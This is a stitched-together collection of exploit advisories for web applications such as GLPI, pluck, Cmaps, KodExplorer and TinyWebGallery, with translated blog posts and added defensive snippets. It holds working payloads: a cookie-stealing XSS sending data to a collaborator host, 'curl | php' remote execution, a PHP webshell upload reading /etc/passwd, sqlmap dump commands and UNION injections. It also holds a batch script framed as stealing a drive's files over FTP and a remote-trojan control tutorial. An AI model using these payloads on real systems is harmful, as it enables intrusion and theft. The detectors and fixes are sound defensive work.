
# Exploit Title: GLPI 9.5.7 - Username Enumeration
# Date: 04/29/2023
# Author: Rafael B.
# Vendor Homepage: https://glpi-project.org/pt-br/
# Affected Versions: GLPI version 9.1 <= 9.5.7
# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz


import requests
from bs4 import BeautifulSoup

# Send a GET request to the page to receive the csrf token and the session cookie
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')

# Parse the HTML using BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')

# Find the input element with the CSRF token
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})

# Extract the CSRF token; without it every POST is rejected, so stop early if it is missing
if csrf_input is None:
    raise SystemExit("CSRF token not found on the lost password page")
csrf_token = csrf_input['value']

# Keep the session cookie(s) under the names the server actually set
cookies = response.cookies.get_dict()

# Set the custom url where the GLPI recover password is located
url = "http://127.0.0.1:80/glpi/front/lostpassword.php"
headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}

# Open the email list file and read each line
with open('emails.txt', 'r') as f:
    email_list = f.readlines()

# Loop through the email list and make a POST request for each email
for email in email_list:
    email = email.strip()
    if not email:
        continue
    data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}
    freq = requests.post(url, headers=headers, cookies=cookies, data=data)

    # Do a new GET request to get the updated CSRF token and session cookie for the next iteration
    response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
    soup = BeautifulSoup(response.content, 'html.parser')
    csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
    if csrf_input is not None:
        csrf_token = csrf_input['value']
    cookies = response.cookies.get_dict()

    # Parse the response and look for the message GLPI only shows for a known address
    soup = BeautifulSoup(freq.content, 'html.parser')
    div_center = soup.find('div', {'class': 'center'})
    message = div_center.text.strip() if div_center is not None else ""
    result = f"Email: {email}, Result: {message}"
    if "An email has been sent to your email address. The email contains information for reset your password." in message:
        print("\033[1;32m Email Found! -> " + result)
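The enumeration above works because the lost-password form answers differently for known and unknown addresses, and it leaves a loud trace: one client POSTing the form many times in a short window. The following detector, an added example that is not part of the advisory, parses Apache combined-format access log lines (constructed here, with the exploit's own `Windows NT 10.0` User-Agent) and flags any client that POSTs `/glpi/front/lostpassword.php` at least `threshold` times within a sliding window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not from the original post): 10.0.0.5 hits the form
# five times in 38 seconds, 10.0.0.9 once, which is normal user behaviour.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Apr/2023:10:00:01 +0000] "GET /glpi/front/lostpassword.php?lostpassword=1 HTTP/1.1" 200 5120 "-" "Windows NT 10.0"
10.0.0.5 - - [29/Apr/2023:10:00:02 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 4870 "-" "Windows NT 10.0"
10.0.0.5 - - [29/Apr/2023:10:00:03 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 4870 "-" "Windows NT 10.0"
10.0.0.9 - - [29/Apr/2023:10:00:04 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Apr/2023:10:00:05 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 4870 "-" "Windows NT 10.0"
10.0.0.5 - - [29/Apr/2023:10:00:06 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 4870 "-" "Windows NT 10.0"
10.0.0.5 - - [29/Apr/2023:10:00:40 +0000] "POST /glpi/front/lostpassword.php HTTP/1.1" 200 4870 "-" "Windows NT 10.0"
"""

# Apache/nginx "combined" format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

RESET_PATH = "/glpi/front/lostpassword.php"


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path (query stripped), ua; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "ts": ts,
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "ua": m.group("ua"),
    }


def detect_reset_enumeration(log_text, threshold=5, window_seconds=60, path=RESET_PATH):
    """Return {client_ip: peak_count} for clients that POST the lost-password form
    at least `threshold` times inside any `window_seconds` window."""
    recent = defaultdict(deque)   # per-IP timestamps of recent reset POSTs
    flagged = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != path:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        # drop timestamps that fell out of the sliding window
        while q and ev["ts"] - q[0] > timedelta(seconds=window_seconds):
            q.popleft()
        if len(q) >= threshold:
            flagged[ev["ip"]] = max(flagged.get(ev["ip"], 0), len(q))
    return flagged


if __name__ == "__main__":
    for ip, count in detect_reset_enumeration(SAMPLE_LOG).items():
        print(f"possible account enumeration from {ip}: {count} reset requests in window")
```

The durable fix is on the application side: the lost-password page must return one identical message whether or not the address exists, so that rate limiting is a second line rather than the only one.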
            
Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs:  XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. create .svg file.
2. svg file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)

poc request


POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close

------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--



4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
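The pluck upload above succeeds because the file manager accepts any SVG and then serves it from /files/ in the site's own origin, where the embedded `<script>` runs. An upload handler needs two independent controls: reject SVGs that carry active content, and serve whatever it does accept in a way the browser will not execute. The validator and response headers below are an added example, not pluck's code; it uses the stdlib XML parser (defusedxml is the safer choice for untrusted input in production) and embeds the advisory's SVG plus two constructed variants as sample input.

```python
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed foreign (HTML) content inside an SVG
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# URL schemes in href/xlink:href that run code or smuggle HTML
ACTIVE_SCHEMES = {"javascript", "vbscript", "data"}


def local_name(qualified):
    """'{http://www.w3.org/2000/svg}script' -> 'script' (drop the namespace prefix)."""
    return qualified.rsplit("}", 1)[-1]


def find_svg_hazards(svg_text):
    """Return the reasons an uploaded SVG must be rejected; an empty list means none were found.
    The stdlib parser does not fetch the external DTD named in the DOCTYPE, so the
    reference in the advisory's file is harmless here."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if local_name(root.tag).lower() != "svg":
        return [f"root element is <{local_name(root.tag)}>, not <svg>"]
    reasons = []
    for el in root.iter():
        tag = local_name(el.tag).lower()
        if tag in FORBIDDEN_ELEMENTS:
            reasons.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            name = local_name(attr).lower()
            if name.startswith("on"):          # onload, onmouseover, ...
                reasons.append(f"event handler attribute {name} on <{tag}>")
            elif name == "href":
                # browsers ignore whitespace/control chars inside the scheme, so strip them first
                scheme = re.sub(r"[\s\x00-\x1f]", "", value).lower().partition(":")[0]
                if ":" in value and scheme in ACTIVE_SCHEMES:
                    reasons.append(f"{scheme}: URL in href on <{tag}>")
    return reasons


def safe_svg_response_headers(filename):
    """Headers for serving a user-uploaded SVG so that, even if a hazard slipped past
    the check, it is downloaded rather than rendered in the site's origin."""
    safe_name = filename.replace('"', "").replace("\r", "").replace("\n", "")
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# Sample inputs: the first is the SVG from the advisory above, the other two are constructed
MALICIOUS_SVG = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>"""

# event-handler attribute plus a scheme obfuscated with a tab (attribute normalisation turns it into a space)
HANDLER_SVG = """<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <a href="java\tscript:alert(2)"><text x="0" y="10">click</text></a>
</svg>"""

CLEAN_SVG = """<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("advisory", MALICIOUS_SVG), ("handler", HANDLER_SVG), ("clean", CLEAN_SVG)):
        print(label, find_svg_hazards(doc) or "accepted")
```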
            
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983

*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admin's cookie is the value of the c parameter

In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
            

Foreword

Not long ago I had an idea: automatically run a script that uploads files from the PC to a server we control. For example, we can specify that all Word documents on the USB flash drive are uploaded to our server, which achieves the purpose of stealing them. So let's see how it is implemented!

Code

@Echo Off

REM Each Echo appends one FTP command to the script file ftp.up (the >> redirections
REM were lost in extraction). server_ip, username and password are placeholders.
Echo open server_ip>>ftp.up
Echo username>>ftp.up
Echo password>>ftp.up
Echo binary>>ftp.up
Echo prompt>>ftp.up
REM lcd takes a directory, mput takes the file pattern
Echo lcd E:\>>ftp.up
Echo mput *.txt>>ftp.up
Echo bye>>ftp.up

REM Run the FTP client non-interactively with the generated script, then remove it
FTP -s:ftp.up
del ftp.up /q

Usage

Save the code as a .bat file. After double-clicking to run it, all txt files on the E: drive will be uploaded to the server we specified.

Title: Kage——msf visual remote control platform

Kage is a tool that turns msf into a visual remote control platform.
Project address
https://github.com/WayzDev/Kage/
Download and Install
Click me to download~
After downloading, give the file execute permission.
Start the service
msfrpcd -U msf -P 123456 -a 0.0.0.0
Parameter description: -U: the login account for Kage; -P: the login password for Kage; -a: msf's IP address (this is important: if Kage and msf are on the same computer, use 0.0.0.0, i.e. 127.0.0.1)
Start the program and log in: ./Kage.0.1.1-beta_linux.AppImage

Enter the account, the password and the corresponding port
After a successful login, the following is shown
We can generate the Trojan with commands or on the platform, according to our specific situation.
Configure the listener

Click Create after the configuration is completed
On the target side, run the generated Trojan successfully and view the session.
All kinds of fancy operations
System Information

File Information

Route Information

Show-off level: maxed out ~~~
## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.30.2023
## Vendor: https://kodcloud.com/
## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
## Reference: https://portswigger.net/web-security/file-upload

## Description:
By using this vulnerability remotely, the malicious pwned_admin can list and manipulate all files inside the server. This is an absolutely DANGEROUS and STUPID decision from the application owner! In this scenario, the attacker prepares the machine for exploitation and sends a link for remote execution by using the CURL protocol to his supporter - another attacker. Then he waits for execution from his colleague, to mask his action, or worse. What a nice hack is this! :)

STATUS: CRITICAL Vulnerability

[+]Exploit:

```CURL
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php | php
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php | php
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)

## Proof and Exploit:
[href](https://streamable.com/98npd0)

## Time spend:
01:15:00

--
nu11secur1ty <http://nu11secur1ty.com/>
Cmaps v8.0 - SQL injection

# Exploit Title: Cmaps v8.0 - SQL injection
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29809

*Description:*
The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page:
http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test
we get the normal JSON response. However, if a single quote gets appended to the value of the `bookmap` parameter we get an error message:

```html
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for SQL injection. To really prove the SQL injection we append the following payload:

```
'-(select*from(select+sleep(2)+from+dual)a)--+
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*
1. Send the following payload to test the vulnerability: `'-(select*from(select+sleep(2)+from+dual)a)--+`
2. If the site slept for two seconds, run the following sqlmap command to dump the whole database including the ldap credentials.

```shell
python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

## Request to the server:
[Screenshot 2023-04-30 at 22.23.51.png]

## Response from the server:
Look at the response time.
[Screenshot 2023-04-30 at 22.24.35.png]
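The `'` then `''` probe in the advisory is the fingerprint of a query that splices the `bookmap` value into SQL text: one quote breaks the statement (the `mysqli_num_rows()` warning is `mysqli_query` returning `false`), two quotes form an escaped quote and the statement parses again. The example below is added here and is not cmaps' code; it reproduces that error/no-error behaviour with Python's sqlite3 against a constructed `booking` table and shows the parameterized form that treats the same input as data.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the cmaps booking table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE booking (id INTEGER PRIMARY KEY, bookmap TEXT, room TEXT)")
    conn.executemany(
        "INSERT INTO booking (bookmap, room) VALUES (?, ?)",
        [("test", "A1"), ("test", "A2"), ("other", "B1")],
    )
    return conn


def list_bookings_vulnerable(conn, bookmap):
    """The pattern behind the advisory: the request parameter becomes part of the SQL text."""
    sql = f"SELECT id, room FROM booking WHERE bookmap = '{bookmap}'"
    return conn.execute(sql).fetchall()


def list_bookings_fixed(conn, bookmap):
    """Same query with a bound parameter: quotes, comments and sleep() are just characters."""
    return conn.execute(
        "SELECT id, room FROM booking WHERE bookmap = ?", (bookmap,)
    ).fetchall()


def probe(query_func, conn, value):
    """Return ('ok', row_count) or ('error', message): the two signals the advisory relies on."""
    try:
        return ("ok", len(query_func(conn, value)))
    except sqlite3.DatabaseError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for value in ("test", "test'", "test''", "test' OR '1'='1"):
        print(repr(value), "vulnerable:", probe(list_bookings_vulnerable, db, value),
              "fixed:", probe(list_bookings_fixed, db, value))
```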
# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47878

Introduction
=================
Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as the web root directory. Consecutive file uploads can lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) In the UI, on the application settings page, the default storage path can be set to any value. This path could be set to the webroot directory of the webserver, e.g. /htdocs/app/docroot/.
2) Then any upload/import function can be used to upload a .php webshell file to the webroot.
3) Execute the webshell from the webroot directory to obtain RCE.
TinyWebGallery v2.5 - Remote Code Execution (RCE)

#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: RCE
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux

2. Technical Details & POC
========================================
steps:

1. Go to the image upload page: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
2. upload a .phar file with the payload:
   <?php echo system("cat /etc/passwd"); ?>
3. go to the file link

poc request:

POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1
Host: localhost
Content-Length: 2123
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close

------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="token"

b2ed5512107a625ef9d5688ced296c61
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="confirm"

true
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename="shell.phar"
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgsize"

100000
------WebKitFormBoundary53rZRhJinqaMm7Ip
Content-Disposition: form-data; name="twgquality"

80
------WebKitFormBoundary53rZRhJinqaMm7Ip--

The uploaded file is then reachable at:
http://localhost/twg25/pictures/shell.phar
Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title

# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and a fexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -

--- Description ---
http://127.0.0.1:3000/admin/login - Login as an Admin
Under the Post tab click on "Create New"
While creating the post, set the Title to "><svg/onmouseover=alert(document.cookie)>
http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent to this url

-- POST DATA --
POST /admin/post_type/2/posts HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 666
Origin: http://127.0.0.1:3000
Connection: keep-alive
Cookie: _my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D; auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1; phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=
-- POST DATA --

Then view the post you've created by clicking on "View Page" and move your mouse cursor onto the post title. The XSS will pop up.
Optoma 1080PSTX Firmware C02 - Authentication Bypass

# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass
# Date: 2023/05/09
# Exploit Author: Anthony Cole
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Vendor Homepage: http://optoma.com
# Version: Optoma 1080PSTX Firmware C02
# Tested on: N/A
# CVE : CVE-2023-27823

Details
By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker on the same network can bypass it by manually setting the "atop" cookie to the value "1".

GET /index.asp HTTP/1.1
Host: projector
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: atop=1
Connection: close
PnPSCADA v2.x - Unauthenticated PostgreSQL Injection

# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8

SQLi crashing point:

GET /hitlogcsv.isp?userids=1337'&startdate= 2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
WBiz Desk 1.2 - SQL Injection

[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
[#] Exploit Date: May 12, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: WBiz Desk
[#] Application Version: 1.2
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech

[#] 3xploit:
[path]//ticket.php?tk=[SQL Injection]

[#] 3xample:
[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -

[#] Notes:
